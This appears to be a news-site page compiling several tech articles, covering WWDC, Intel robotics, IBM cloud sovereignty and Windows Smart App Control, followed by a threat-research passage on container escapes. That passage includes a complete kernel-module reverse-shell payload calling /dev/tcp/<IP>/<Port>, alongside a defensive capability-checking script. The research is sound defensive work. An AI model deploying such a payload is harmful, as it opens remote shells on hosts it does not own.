WWDC: What can developers expect?
Apple will open the doors to developers at its Worldwide Developer Conference (WWDC) next week. Beyond a big push on AI and new OSes focused on stability and performance, what should developers expect? Mostly it’s about new APIs, Foundation Models, and App Intents; here’s what I’ve been able to figure out so far.
Foundation Models
Apple has been building new Apple Intelligence APIs. One way it is achieving this is to take models made with Google Gemini, then distill and shrink them to fit inside (and run on) its devices. The progression will be to introduce these as a new crop of Foundation models developers can use in their apps. There’s more:
- New APIs mean developers will be able to run Apple Intelligence tools such as summarization directly on the customer device, all offline, all private.
- Developers that use Apple’s standard text editing/entry views will gain access to improved Apple-developed tools inside their apps without custom-coding.
- Because intelligence takes place on the user’s device, neither developers nor users will need to pay for those AI tokens. This is a distinct cost and privacy-saving advantage for customers and developers.
Apple continues on its quest to convince developers to make features of their apps available for use via Siri with App Intents. Doing so requires developers to wrap their apps into semantic structures, enabling speech/text-based interaction. To help them achieve this, Apple is expected to introduce a complete redesign of its App Intents framework.
Speak as you wish
While users must say “Hey Siri” to invoke its attention today, the assistant will respond more dynamically to natural language. Combined with App Intents, that means users should be able to ask Siri to use a combination of apps to make things happen on the device.
A developer might build a travel app that can take an itinerary and hand it across to a budgeting tool, for example. The idea is that with a spoken or typed command, a person will be able to call on a collection of apps to identify the destination, create an itinerary, put together a to-do list, prepare relevant letters or emails, and assemble a budget — all invoked by the original command.
What about context?
We’re expecting Siri to become better at using the content of your screen, location, and other personal data as it seeks to provide more contextualized responses. We don’t yet know the extent or form in which Apple will make that information available to third-party developers to help contextualize their own apps. Apple’s focus on privacy matters a great deal, as does its relationship with regulators, some of whom will demand that data made available to Apple’s own apps be made available to third-party apps. These are important matters for Apple, app developers, and customers who want the convenience of AI without loss of privacy.
More consistent UI tools on Swift
Swift should get better at migrating legacy code, but the big speculation around it concerns Liquid Glass. Will Swift make it easier for developers to build consistent user interfaces that work properly across all Apple’s platforms? If it does, then it will help overcome one of the big criticisms of Apple’s liquid-inspired UI. Swift will also usher in the tools developers need to support agentic application coding.
Better vibes for Xcode
Vibe coding is everywhere, including within Xcode, which is expected to gain improved contextual and predictive understanding to help boost developer productivity. Xcode could also introduce improved real-time architectural debugging hints, aiming to make it easier for developers to build bug-free apps.
A Mac you can wear: Vision OS
All the AI enhancements made available across Apple’s other products will also be offered to visionOS. That access takes the headset another step closer to becoming the Mac you wear like sunglasses.
Elsewhere
- A new Camera API means developers can build specialized, interactive buttons that users can deploy directly within the native iOS Camera interface. This should be a great way to use more sophisticated camera apps more naturally.
- Wallet Pass means apps will be able to ingest things like barcodes or gym passes for use within Wallet.
- Icon Composer might offer more tools designed to promote consistency.
Apple will abandon Intel support in macOS 27, which means developers will likely end support for legacy Intel applications in response.
After the gold rush
Once the lights go down on WWDC, Apple’s real test will be to see if its announcements help make AI useful, private, and affordable to developers and their customers. After all, if Apple gets AI right on a platform basis, it should be able to offer the kind of on-device intelligence no one else can match, at no charge to developers or users — a move that might yet kick-start AI innovation across its platforms. This will provide a moat around the Apple ecosystem, inside which developers can explore new potentials for AI to give customers the tools they need at costs they can afford.
Microsoft investigates Office Apps, Teams file access issues
Race Against Time: Why Faster Vulnerability Alerts Matter
⚡ Weekly Recap: New Linux Flaw, PAN-OS Exploit, AI-Powered Attacks, OAuth Phishing and More
Intel stakes new claim in physical AI with robotics chips
Intel is invading the physical AI space with a reentry into the robotics market it quit many years ago amid financial struggles.
The robotics strategy is part of the company’s larger plan to establish AI on the “edge,” in which devices have the computing capability to run AI locally. Many devices lack AI capabilities and have to offload processing to the cloud.
The chipmaker said its Intel Series 3 processors are now in 130 edge AI and robotics designs. It also had a design win with SensoryAI, which provides technology for robots that include Ella, a robotic barista made by Crown Digital.
The company’s Core Ultra Series 3 processors are derivatives of chip designs intended for laptops. But Intel has achieved a level of power efficiency for long battery life that allows those chips to be adapted for handheld devices and laptops.
Intel also said it can build advanced robotics chips thanks to its latest manufacturing technologies.
For example, many robotic functions, such as computer vision and real-time controls, can be integrated into a single chip. Previously, functions like graphics and movement and control were distributed among different cores in a chip.
SensoryAI, for example, has a chip architecture that provides the robotic barista — which is more like a robotic arm — with AI capabilities, Intel said.
The main “Avatar” agent handles customers as the main “Ella” agent reasons and executes the task. If Ella encounters errors, it passes on the issue to a Guardian agent, which helps with the recovery. Some issues could include making sense of an order, or cups that might be stuck.
The three agents are embedded in a single piece of Core Ultra Series 3 silicon.
Intel is displaying some of those robots at the Computex trade show in Taiwan. The company shared a video of a humanoid-style robot from the floor in an X.com post.
This is not Intel’s first attempt at the robotics market. Intel sold robotics chips and kits when it was a dominant chip player in the field, but curtailed efforts in 2021 after Pat Gelsinger took over as CEO and restructured the company to focus on manufacturing.
Robotics is now back on the menu under new Intel CEO Lip-Bu Tan, who replaced Gelsinger last year. He has restructured the company to focus on high-growth areas that can generate high returns.
A Morgan Stanley study last year indicated the robotics market could be worth $5 trillion by 2050 — and more than 1 billion humanoid robots could be in operation.
Robots are seen to improve human productivity and manufacturing output. For example, they could help factories that are facing labor shortages or be used to complete tasks that are dangerous.
However, challenges remain. There isn’t yet enough real-world data to train robots to do targeted work. And the AI models — generally called world models — they will need are still under development.
Training robots to do a specific job requires a sequence of events to happen in succession without any errors. Companies are still training robots to spot and understand errors, analyze possible resolutions, and take the right corrective action.
Critical Windows Netlogon RCE flaw now exploited in attacks
Webinar tomorrow: From alert to resolution in network incident response
IBM unveils tool to track sovereignty risks for cloud workloads
IBM has launched a tool designed to help customers assess cloud-sovereignty risks and meet regulatory compliance requirements.
The Sovereignty Risk Profile launch comes as digital sovereignty becomes a higher priority for organizations concerned about where data is stored and processed. According to an IBM survey, 93% of executives believe sovereignty needs to be part of their business strategy.
Via the new tool, customers can set up policies related to regulatory and business requirements — such as where data resides and how it’s protected, for instance. These policies can be applied to specific cloud workloads, regions, or zones in the Sovereignty Risk Profile tool, allowing users to track sovereignty requirements “in real time,” IBM Cloud product manager Janet Van said in a blog post, with “visibility into configurations, encryption posture, and environmental controls.”
It’s then possible to assess compliance and decide what workloads meet sovereignty requirements.
Tracking the factors that contribute to sovereignty is a challenge for many organizations, said Holger Mueller, vice president and principal analyst at Constellation Research. “It is very difficult, as you don’t know about the details of the stacks; sometimes, even the location of data is not fully transparent,” he said.
The Sovereignty Risk Profile “addresses many of the compliance-related requirements associated with data residency and encryption, while also tackling sovereignty from a resilience and concentration-risk perspective,” said Dario Maisto, senior analyst at Forrester.
However, the monitoring tool can only do so much to address digital sovereignty concerns, he said. While it can help organizations identify and report on potential issues, it “does not help [make] clients more or less sovereign, per se: it has only the potential to tell that a sovereignty problem is there.”
Broader questions around digital sovereignty remain difficult to address, he said, as there’s no universally accepted definition of the concept and limited legislation to establish clear requirements.
Mueller described a spectrum of sovereignty issues that depend on factors such as whether data is stored, processed, and backed up in a customer’s own country, as well as whether staff that operate the data are domestic nationals. “Then there is the sovereignty of the software supply chain — but here everybody is dependent,” he said.
To further complicate matters, while several US hyperscalers sell sovereign-branded cloud services to European customers — with local staff and infrastructure — concerns remain about the potential for extra-jurisdictional access to data, due to the US CLOUD Act and the US Foreign Intelligence Surveillance Act (FISA).
The Sovereignty Risk Profile is available within IBM’s Security and Compliance Center Workload Protection. It’s the latest in a range of IBM Cloud products aimed at addressing customers’ sovereignty concerns, including the recently launched IBM Sovereign Core software platform.
China-Aligned Groups Ramp Up Attacks: Dragon Weave Hits Czech Republic & Taiwan
Microsoft fixes outage affecting MFA setup, MySignIn service
Microsoft confirms outage affecting MFA, My Sign-Ins platform
The Security Growth Platform: Why MSPs Are Moving Beyond vCISO Tools
Windows 11 Smart App Control explained
In the ever-evolving cybersecurity landscape, Microsoft has introduced various new features in Windows 11 designed to protect users from modern workplace threats. Among such features, Smart App Control (SAC) changes how Windows devices handle, and occasionally block, unwanted or potentially malicious applications.
But what exactly is Smart App Control? How does it work, who benefits most, and are there any caveats? In this story we’ll share some history and explain why SAC has been something of a stealth feature in Windows 11.
What is Smart App Control?
Smart App Control is a security feature in Windows 11 designed to block untrusted or potentially dangerous applications from running on a PC. Built directly into the operating system (through Windows Security), SAC leverages code signing, Microsoft’s intelligence cloud, and artificial intelligence to make real-time decisions about whether an app or application should be allowed to run. Its goal is to minimize the risk that malware, ransomware, and unwanted software could run on users’ systems — with minimal user intervention.
At its heart, Smart App Control is a kind of gatekeeper. When you attempt to run an app, SAC evaluates its trustworthiness. That evaluation is based on numerous criteria: Is the app digitally signed? Is it widely used and recognized as safe by Microsoft’s threat intelligence network? Has it been flagged previously for questionable behavior?
If an app fails one or more such checks and is found suspicious or untrustworthy, SAC blocks its execution, silently preventing a potential security event before it starts.
How does Smart App Control work?
SAC operates using a combination of cloud-based intelligence, local analysis, and digital signatures. Here’s a step-by-step breakdown of how it functions:
- App verification: When a user attempts to launch an application, SAC inspects the file. It first checks if the app is digitally signed by a trusted publisher, an important indicator of legitimacy.
- Cloud intelligence search: SAC then consults Microsoft’s extensive security databases in the cloud. These aggregate threat data from millions of Windows devices worldwide. If the app has been flagged already or is recognized as part of any malware campaign, it is blocked.
- AI-based analysis: For less clear-cut instances, SAC uses AI to evaluate an app’s behavior. That is, it looks for telltale signs of malware or unwanted code. Such a dynamic analysis helps catch emerging threats not yet known to the cloud.
When an app is blocked, the user gets a clear, informative notification. Usually, there’s no way to override SAC’s decision, which puts security ahead of convenience. It also ensures that users will quickly report false positives.
Smart App Control is designed to be simple and automatic. Unlike conventional antivirus or endpoint security, it requires no updates to definitions, nor manual scans. SAC works behind the scenes to block threats in real time. Because it uses both local and cloud-based intelligence, it’s always current.
On the downside, some legitimate apps, especially older or custom business software, may not be digitally signed, resulting in false positives. If SAC decides an app is unsafe, the only way to run the app is to turn SAC off.
Working with Smart App Control
Notably, Smart App Control is enabled by default — but only on “clean installs” of Windows 11 version 22H2 or later. Systems upgraded from older versions of Windows 11 will always show SAC in the “Off” state.
Microsoft made this decision to avoid potential compatibility issues with legacy or line-of-business applications. That means users can’t benefit from SAC unless they have a newer PC or somebody reinstalls Windows 11 from scratch on an older one. (See my Windows clean install tutorial for complete instructions.)
SAC prerequisites
To get granular: SAC requires that the following be present as Windows 11 comes up for the first time:
- Secure Boot, a security feature that allows only trusted, digitally signed software to run as Windows boots up
- A working chain of trust, including current CA-2023 boot certificates in Unified Extensible Firmware Interface (UEFI) and a CA-2023 compliant bootloader
Newer PCs — namely, those built in 2018 or later, with Windows 10 or 11 installed prior to delivery — routinely include UEFI-only boot and support Secure Boot from the get-go. Indeed, Secure Boot was introduced with Windows 8, and the original certificates came along in 2011 (Production PCA 2011, UEFI CA 2011, and KEK CA 2011). They’ve been shipped in firmware ever since.
As long as such machines get updated through Windows Update (or some managed equivalent, such as Microsoft Intune, Windows Autopilot, or Microsoft Configuration Manager), the new certificates and a proper chain of trust should be established on those PCs. (See FAQ: What you need to know about expiring Windows Secure Boot certificates for more information.) All this said, only Windows 11 imposes a working Secure Boot environment as a hard and fast system requirement as of 2021.
In short, Secure Boot and the chain of trust provide the essential foundation for SAC to start with a clean bill of health, security wise, and keep things that way. To learn more about Secure Boot and its various certificates and trappings, consult the Secure Boot and Windows Secure Boot Key Creation and Management Guidance pages on Microsoft Learn.
Modes of operation
SAC has three distinct modes:
- On: SAC actively monitors and blocks untrusted apps.
- Evaluation: SAC quietly observes your usage patterns and system needs before fully activating.
- Off: SAC is disabled and will not intervene.
SAC will normally start in Evaluation mode for up to a month, then turn itself On or Off depending on observed system behavior. Once turned on, SAC cannot be set back into Evaluation mode. Organizations or users who run custom software or specialized workflows should leave SAC in Evaluation mode to ensure that business functions keep working.
To check SAC’s status:
- Open the Windows Security app.
- Navigate to App & browser control.
- Look for the “Smart App Control” section. You’ll see the current status: On, Off, or Evaluation mode, as shown in Figure 1.
Figure 1: On this PC, the evaluation period is over and Smart App Control is enabled.
Ed Tittel / Foundry
Until recently, SAC could not be toggled off and on again — once it was turned off, you had to reinstall or reset Windows 11 to re-enable it. But with the April 2026 Patch Tuesday release of Windows 11 (KB5083769), admins and elevated users can turn SAC on or off as they see fit, as long as the initial setup conditions described above are met.
This toggling capability is a step forward for usability and safety, because it lets users with administrative privileges temporarily disable SAC in order to install, update, or uninstall certain unsigned apps, such as those that rely on Windows Installer Transform (MST) files, and then turn SAC back on immediately.
Note that this feature is being gradually rolled out, so you may not have access to it yet.
Smart App Control compared to other Windows 11 protections
Microsoft has long offered security features like Windows Defender, Controlled Folder Access, and Application Control. SAC differs in its general, automated approach. Rather than relying on static definitions, group policies, or user input, SAC leverages real-time intelligence and AI.
In many ways, SAC takes the best bits of Application Control (previously available through Device Guard and Windows Defender Application Control) and makes them accessible to a wider audience. It also involves little or no manual setup and few, if any, policy issues. Then again, as covered earlier in the story, SAC also functions as a black box: one either lives with its judgments, or does without it.
Real-world impact and industry reception
Feedback from the IT community has been mostly positive. Security researchers note SAC’s ability to block emerging threats before traditional antivirus solutions can respond. But SAC is hardly bullet-proof: a number of studies cite focused exploits or workarounds to bypass or trick SAC. For instance, Elastic Security Labs documented multiple techniques to break SAC in 2021, with follow-ons from Hacker News and TechRadar.
As always, a proactive approach to cybersecurity that includes teaching users to avoid trouble remains a key ingredient in establishing and maintaining a strong security posture.
For end users, SAC’s presence may go largely unnoticed — until, that is, it intercepts a malicious download or prevents installation of a suspicious or malicious program. Or, as the case may sometimes be, when users try to run old, unsigned software that SAC won’t allow.
Tips for IT administrators
For IT professionals considering deploying devices with SAC, certain best practices are worth implementing:
- Test SAC in Evaluation mode before rolling out widely, especially if your organization relies on custom or legacy software, or if anything important is unsigned.
- Educate users about SAC’s presence and purpose so they understand why certain apps may be blocked. Set up a procedure to request support and/or fixes, particularly if important software gets blocked. Possible workarounds include restricted VMs with SAC turned off to run unsigned applications.
- Maintain an up-to-date inventory of critical applications and ensure as many as possible are digitally signed by trusted publishers.
- Monitor Microsoft resources (Learn, Support, and Answers forums) for SAC updates, compatibility lists, and troubleshooting tips.
As threats continue to evolve, Microsoft should continue to expand SAC’s capabilities. Undoubtedly it will use more advanced AI models and deeper integration with Windows Defender and Microsoft 365 security. Future updates may introduce more granular controls for enterprise environments, including managed exceptions and better reporting tools.
For now, SAC represents a useful additional tool for Windows security. It’s intended to shift the balance in favor of the good guys in the ongoing war against malware. So far, it’s been a modest step forward. But it’s not unthinkable that SAC could offer more and better protection in upcoming Windows releases.
This article was originally published in September 2025 and updated in June 2026.
Microsoft fixes KB5089549 Windows security update install issues
Containers on fire: from container escapes to supply chain attacks
Modern infrastructures universally rely on containerization to deploy applications, scale services, and build cloud platforms. The use of Docker, Kubernetes, and similar technologies has become the corporate standard for efficient automation. However, as containers grow in popularity, so does the interest of malicious actors — a trend we actively track in our research into advanced cyberthreats. For instance, in one of its recent attacks, the APT group TeamPCP compromised Checkmarx KICS across multiple attack chains for different vectors. This included poisoning a Docker Hub repository to later steal Kubernetes secrets and other sensitive data. The tainted images distributed a stealer that was loaded during the KICS scanning process.
Today, attacks on container environments have evolved into full-fledged, multi-stage scenarios involving supply chain compromises, Kubernetes secrets theft, orchestration API abuse, and container escape attempts. This article examines the primary container attack vectors that retain top relevance today.
Principles of containerization
A container is an isolated code execution environment, designed to partition resources so applications can run correctly and independently. Unlike a virtual machine, a container uses the single underlying kernel of the host operating system.
To isolate the environment, a container uses a distinct process namespace and a virtual file system. Container resources are capped and shared with the host system. This container isolation is built on top of Linux kernel features such as namespaces, cgroups, capabilities, and seccomp.
Compromising a container can help attackers achieve their objectives on the host system itself. Below, we examine the current vectors relevant to container implementation architecture and infrastructure.
Current attack vectors
The primary and most critical attack vectors targeting container environments that are actively exploited by malicious actors include:
- Exploiting vulnerabilities in the host system and container runtime components
- Malicious activity inside a compromised container
- Container escape followed by host compromise
- Exploiting misconfigurations and the insecure use of containerization and orchestration APIs
- Supply chain attacks, including container image poisoning and CI/CD pipeline compromise
Each of these vectors can be utilized either independently or as part of a complex, multi-stage attack chain. In practice, attackers rarely stop at compromising a single container; their primary objective is often to gain access to the Kubernetes cluster, secrets management systems, or other mission-critical environment components. This is why securing container infrastructure requires a comprehensive approach that spans configuration auditing, runtime protection, activity monitoring, and software supply chain security. Let’s take a closer look at each of these vectors.
Exploiting host system vulnerabilities
Because a container does not have its own isolated OS, vulnerabilities affecting the Linux kernel or runtime components remain just as critical when exploited from within a container.
Any vulnerability that allows for privilege escalation, arbitrary code execution, or isolation bypassing can potentially be leveraged by an attacker once the container is compromised. Successful exploitation of these flaws can lead to a container escape, compromise of the Kubernetes node or the entire cluster, lateral movement across the infrastructure, secrets theft, and malicious actions potentially culminating in a complete service disruption. It is worth noting that the mere presence of a vulnerability does not always guarantee a compromise, as exploitation sometimes requires specific configuration settings or privileges to work.
Below are examples of several vulnerabilities leveraged in attacks on container environments:
- CVE-2019-5736 is one of the most prominent and illustrative vulnerabilities associated with containerization. It affected the runC runtime environment and allowed an attacker, who already had root access inside the container, to execute arbitrary code on the host system with root privileges. The root cause of the vulnerability was runC’s improper handling of the file descriptor for its own executable via the /proc/self/exe mechanism. When a container was started, the runC process temporarily executed within the container’s context while remaining a host system process. This allowed an attacker to gain access to the runC binary and overwrite its contents.
- CVE-2022-0492 is a critical Linux kernel vulnerability that allows for container escape and arbitrary command execution on the host system. The flaw stemmed from improper privilege validation when interacting with the cgroups release_agent mechanism. This vulnerability posed a particular risk for container infrastructures because it allowed an attacker who already possessed code execution capabilities inside a container to break out of isolation and gain control of the host system.
- CVE-2024-21626 is a critical vulnerability in runC that allowed an attacker to access the host file system from within a container, and in specific scenarios, even perform a complete container escape. The root cause of the issue was runC’s improper handling of file descriptors and the process’ current working directory when spinning up containers or executing commands via docker exec or similar mechanisms.
Sometimes, an attacker does not need to exploit complex attack chains involving container escapes, Kubernetes cluster compromise, or lateral movement to achieve their goals. In many cases, the container itself already houses data and resources that are highly valuable to the attacker. For example, a container may contain:
- User and service credentials
- API keys
- Access tokens
- SSH keys
- Environment variables containing secrets
- Kubernetes ServiceAccount tokens
- Configuration files
- Application service data or databases
These types of data are especially prone to exposure due to configuration mistakes or specific operational processes. For instance, secrets might be passed via environment variables, baked into Docker images during the build phase, or mounted directly inside the container. In Kubernetes environments, automatically mounted ServiceAccount tokens are of particular interest to attackers, as they provide a direct pathway to interact with the Kubernetes API.
Even a single compromised container frequently provides an attacker with sufficient leverage for next steps: gaining access to external services, compromising cloud infrastructure, stealing user data, impersonating a trusted service, or establishing persistence within the environment. Beyond data theft, malicious actors can use a compromised container as a staging ground for further malicious activity. This is why securing container infrastructure is about much more than just preventing escapes. Even a fully isolated container, if it houses sensitive data or holds access to internal services, can become a major foothold for an infrastructure breach.
In the context of this vector, approaches and techniques applicable not only to container environments but also to traditional systems are frequently applied. Once an attacker gains access to a container, they usually find themselves in a full-featured Linux environment, allowing them to deploy standard post-exploitation, reconnaissance, and persistence methods.
We explored container configuration errors and other unsafe practices that attackers could exploit to carry out malicious activities in more detail in this article.
Container escape
Container escape is one of the most dangerous and prevalent attack vectors targeting container infrastructure. The term refers to the bypassing of container isolation, allowing an attacker to directly interact with the host system.
The opportunity to escape a container can arise from a multitude of sources: the exploitation of vulnerabilities, container misconfigurations, or the insecure use of containerization and orchestration APIs. Indeed, container escape is the logical conclusion of most attacks on container infrastructure, as the attacker’s ultimate goal is frequently to break out of the isolated environment and gain access to the host system or the broader Kubernetes cluster. As such, container escape ties together a significant portion of the attack vectors discussed in this article. In practice, misconfigurations remain one of the most common root causes of successful container escapes, as they occur far more frequently than the exploitation of complex vulnerabilities. With that in mind, we will take a closer look at container misconfigurations and their associated attack scenarios below.
To better understand the risks associated with container misconfigurations, let’s explore the concept of capabilities in Linux systems. This is a mechanism for granularly granting extended permissions to processes, allowing them to perform privileged actions without needing full root access.
Privileged containers
One of the most dangerous configurations is running a container with the --privileged flag. In this mode, the container is granted all Linux capabilities, direct access to host devices, and the ability to interact with kernel interfaces. A container configured this way virtually ceases to be an isolated environment and, in many cases, possesses capabilities comparable to root access on the host system.
Let’s look at a basic example of a container escape attack involving the --privileged flag. Using the capsh utility, you can see that such a container possesses virtually all Linux capabilities. Furthermore, if the PID namespace matches the host’s, the process with PID=1 corresponds to init, the first system process in Linux. In a different configuration, PID 1 would belong to the process that created the container. If we spawn a shell from the init process using the nsenter utility, the expected behavior is the creation of a process outside the container, which can easily be verified by using the hostname command.
Container privilege misconfigurations open up a broad attack surface. Let’s dive deeper into how specific capabilities can be used to execute a container escape.
CAP_SYS_ADMIN is considered one of the most dangerous Linux capabilities in the context of container security. Although Linux capabilities were originally intended to break down superuser privileges into discrete categories, over time, CAP_SYS_ADMIN became a catch-all for a massive number of sensitive kernel operations. As a result, a container granted this capability gains access to a wide array of system mechanisms that directly impact container isolation. It inherits the ability to mount file systems, interact with the cgroups mechanism responsible for resource allocation, modify kernel parameters within certain limits, work with loop devices, and utilize various namespace management features. In practice, this heavily blurs the line between the container and the host system.
This capability becomes especially dangerous when combined with other configuration errors. For instance, if the container is configured to use the hostPath parameter, an attacker can leverage a container compromise to mount the host system’s directories right into their own environment and access critical host files. Similarly, having access to /proc or /sys allows for direct interaction with internal Linux kernel mechanisms, which can drastically expand the blast radius of the breach.
Let’s look at a clear example of how having CAP_SYS_ADMIN can help an attacker escape a container. Illustrated below is the sequence of actions inside a container possessing CAP_SYS_ADMIN privileges and access to host directories. By mounting the host’s disk to a folder inside the container, the attacker can freely interact with all files on the host system. This specific example shows the ability to overwrite the root user’s shell configuration by injecting an arbitrary malicious payload.
CAP_SYS_MODULE
CAP_SYS_MODULE provides direct access to the kernel module loading and unloading mechanism. This direct interaction with kernel space makes CAP_SYS_MODULE a high-risk capability, unlike many other capabilities that are restricted purely to user space.
From a Linux architectural standpoint, kernel modules consist of code executing with maximum privileges inside kernel space. These modules can extend system functionality, manage devices, handle the network stack, interface with file systems, and control other mission-critical components. This is why the ability to dynamically load these modules via CAP_SYS_MODULE equates to having the power to manipulate the behavior of the entire operating system.
In practice, modern containerized applications rarely require CAP_SYS_MODULE. The presence of this capability is typically tied to legacy architectures, monitoring systems, or specialized drivers that must interact directly with the kernel. This is why CAP_SYS_MODULE is almost universally banned in modern infrastructures. In most environments, it is considered an unacceptable risk because its compromise does not just lead to localized privilege escalation within the container, but to code execution directly in kernel space.
A container escape using this capability happens in several stages. The goal of the attack in this case is to load a malicious Linux kernel module. It is worth noting that the module must match the specific kernel version in use, requiring the attacker to perform additional reconnaissance to identify it. These attacks can be executed entirely within the container if it contains the necessary build tools to compile the module and has access to kernel dependency directories. However, because these utilities are typically stripped from container images, attackers usually compile the malicious payload with the required dependencies on an external host. They then either transfer it over the network or drop it into a binary file on the target by using a command like echo.
Let’s look at a container escape using a kernel module with the following payload example:
    #include <linux/kmod.h>
    #include <linux/module.h>

    MODULE_LICENSE("Test");
    MODULE_AUTHOR("Test");
    MODULE_DESCRIPTION("reverse shell module");
    MODULE_VERSION("1.0");

    char* argv[] = {"/bin/bash","-c","bash -i >& /dev/tcp/<IP>/<Port> 0>&1", NULL};
    static char* envp[] = {"PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin", NULL };

    static int __init reverse_shell_init(void) {
        return call_usermodehelper(argv[0], argv, envp, UMH_WAIT_EXEC);
    }

    static void __exit reverse_shell_exit(void) {
        printk(KERN_INFO "Exiting\n");
    }

    module_init(reverse_shell_init);
    module_exit(reverse_shell_exit);

Upon loading, this module triggers the reverse shell. Once the payload is built and successfully delivered to the container, all the attacker needs to do is start a listener on the IP address and port specified in the payload, and then load the module into kernel space.
CAP_SYS_PTRACE
The CAP_SYS_PTRACE capability grants a process elevated permissions to interact with other system processes via the ptrace system call. While it is designed for debugging and code tracing, its misconfiguration in containerized environments can severely weaken isolation and, under certain conditions, enable a container escape leading to host system compromise.
The primary risk of CAP_SYS_PTRACE is that it allows a process to read and modify the memory of other processes, control their execution, inject code, and extract sensitive data directly from memory. Furthermore, CAP_SYS_PTRACE enables process injection techniques.
If a container is compromised, an attacker can use ptrace to attach to host processes. Crucially, this is only possible if the host’s PID namespace is shared with the container — this is configured via hostPID: true. This configuration allows the attacker to target a process running on the host, inject code, and trigger a reverse shell — though in most cases, this requires additional malicious code. The image below demonstrates this kind of attack, implemented using a publicly available PoC.
CAP_NET_ADMIN
CAP_NET_ADMIN provides extensive privileges to manage the network stack of a Linux system. If a container is compromised, the presence of this capability significantly weakens network isolation and creates additional opportunities for further exploitation.
A container equipped with CAP_NET_ADMIN can modify network interface configurations, manipulate routing tables, interact with traffic filtering mechanisms, and alter the behavior of the network stack. Although most of these operations are formally restricted to the container’s own network namespace, in practice, this capability is frequently combined with other misconfigurations — such as the hostNetwork: true parameter — which grants direct access to the host’s network resources.
Once inside the container, an attacker can leverage this capability to modify its network behavior and launch further attacks across the infrastructure. One of the most common scenarios involves manipulating iptables rules to redirect traffic. This enables man-in-the-middle (MitM) attacks, allowing the attacker to intercept internal traffic or mask their own malicious activities.
It is important to emphasize that there are many other Linux capabilities that can lead to a container escape when combined with specific misconfigurations; we have highlighted only a few of the most severe and frequently encountered.
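The capsh check described above can be reproduced from /proc/<pid>/status alone. The following is an added example, not code from the original article: it decodes the capability masks and flags the four capabilities covered in this section, including the case where a non-root process shows an empty effective set while the container's bounding set still carries a risky grant. The three status dumps are constructed samples.

```python
"""Decode Cap* masks from /proc/<pid>/status and flag the capabilities named above."""

# Bit N of a mask is capability number N (include/uapi/linux/capability.h).
CAP_NAMES = [
    "CAP_CHOWN", "CAP_DAC_OVERRIDE", "CAP_DAC_READ_SEARCH", "CAP_FOWNER",
    "CAP_FSETID", "CAP_KILL", "CAP_SETGID", "CAP_SETUID", "CAP_SETPCAP",
    "CAP_LINUX_IMMUTABLE", "CAP_NET_BIND_SERVICE", "CAP_NET_BROADCAST",
    "CAP_NET_ADMIN", "CAP_NET_RAW", "CAP_IPC_LOCK", "CAP_IPC_OWNER",
    "CAP_SYS_MODULE", "CAP_SYS_RAWIO", "CAP_SYS_CHROOT", "CAP_SYS_PTRACE",
    "CAP_SYS_PACCT", "CAP_SYS_ADMIN", "CAP_SYS_BOOT", "CAP_SYS_NICE",
    "CAP_SYS_RESOURCE", "CAP_SYS_TIME", "CAP_SYS_TTY_CONFIG", "CAP_MKNOD",
    "CAP_LEASE", "CAP_AUDIT_WRITE", "CAP_AUDIT_CONTROL", "CAP_SETFCAP",
    "CAP_MAC_OVERRIDE", "CAP_MAC_ADMIN", "CAP_SYSLOG", "CAP_WAKE_ALARM",
    "CAP_BLOCK_SUSPEND", "CAP_AUDIT_READ", "CAP_PERFMON", "CAP_BPF",
    "CAP_CHECKPOINT_RESTORE",
]

# The capabilities this section covers, with the reach the article attributes to each.
HIGH_RISK = {
    "CAP_SYS_ADMIN": "mounts, cgroups, namespaces; worse with hostPath, /proc or /sys",
    "CAP_SYS_MODULE": "kernel module loading, i.e. code execution in kernel space",
    "CAP_SYS_PTRACE": "attach to other processes; reaches the host with hostPID: true",
    "CAP_NET_ADMIN": "interfaces, routes, iptables; reaches the host with hostNetwork: true",
}

# Kernels before 5.8 stop at CAP_AUDIT_READ (bit 37), so "every capability"
# is judged on bits 0..37 to work on old and new kernels alike.
PRE_5_8_FULL_SET = (1 << 38) - 1

CAP_FIELDS = ("CapInh", "CapPrm", "CapEff", "CapBnd", "CapAmb")


def parse_status(text):
    """Return {field: mask} for the Cap* lines of a /proc/<pid>/status dump."""
    masks = {}
    for line in text.splitlines():
        key, _, value = line.partition(":")
        if key in CAP_FIELDS:
            masks[key] = int(value.strip(), 16)
    return masks


def decode(mask):
    """Turn a capability bitmask into a list of names, lowest bit first."""
    names = [name for bit, name in enumerate(CAP_NAMES) if (mask >> bit) & 1]
    extra = mask >> len(CAP_NAMES)
    if extra:  # bits newer than this table
        names.append("UNKNOWN(0x%x)" % (extra << len(CAP_NAMES)))
    return names


def assess(status_text):
    """Summarise the risk of one process from its status dump."""
    masks = parse_status(status_text)
    eff = masks.get("CapEff", 0)
    bnd = masks.get("CapBnd", eff)
    risky_eff = [c for c in decode(eff) if c in HIGH_RISK]
    # Not effective now, but still obtainable (setuid or file-capability exec).
    risky_bnd = [c for c in decode(bnd) if c in HIGH_RISK and c not in risky_eff]
    return {
        "effective": decode(eff),
        "high_risk_effective": risky_eff,
        "high_risk_bounding_only": risky_bnd,
        "looks_privileged": (eff & PRE_5_8_FULL_SET) == PRE_5_8_FULL_SET,
    }


# Constructed samples: the mask commonly seen for Docker's default capability
# set, a --privileged container, and a non-root process whose container was
# started with SYS_PTRACE added.
DEFAULT_STATUS = "Name:\tsh\nCapEff:\t00000000a80425fb\nCapBnd:\t00000000a80425fb\n"
PRIVILEGED_STATUS = "Name:\tsh\nCapEff:\t000001ffffffffff\nCapBnd:\t000001ffffffffff\n"
NONROOT_STATUS = "Name:\tapp\nCapEff:\t0000000000000000\nCapBnd:\t00000000a80c25fb\n"

if __name__ == "__main__":
    for label, dump in (("default", DEFAULT_STATUS),
                        ("privileged", PRIVILEGED_STATUS),
                        ("non-root", NONROOT_STATUS)):
        result = assess(dump)
        print(label, result["looks_privileged"],
              result["high_risk_effective"], result["high_risk_bounding_only"])
```

On a live host, the same function can be fed the contents of /proc/<pid>/status for each container's main process.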
Exploitation of orchestration APIs
One of the most dangerous and common attack vectors in containerized infrastructure is the exploitation of misconfigured container management and orchestration APIs. Unlike attacks that require complex kernel vulnerability exploits or container escape, this scenario is often remarkably straightforward: the attacker simply needs to gain access to the control interfaces of the container environment.
The fundamental risk stems from the fact that container platform APIs possess inherent administrative privileges over the entire infrastructure. The Docker API, Kubernetes API, and kubelet API are designed to spin up containers, modify configurations, access host file systems, and execute commands inside running containers. When misconfigured, these interfaces immediately become a point of failure for the entire environment.
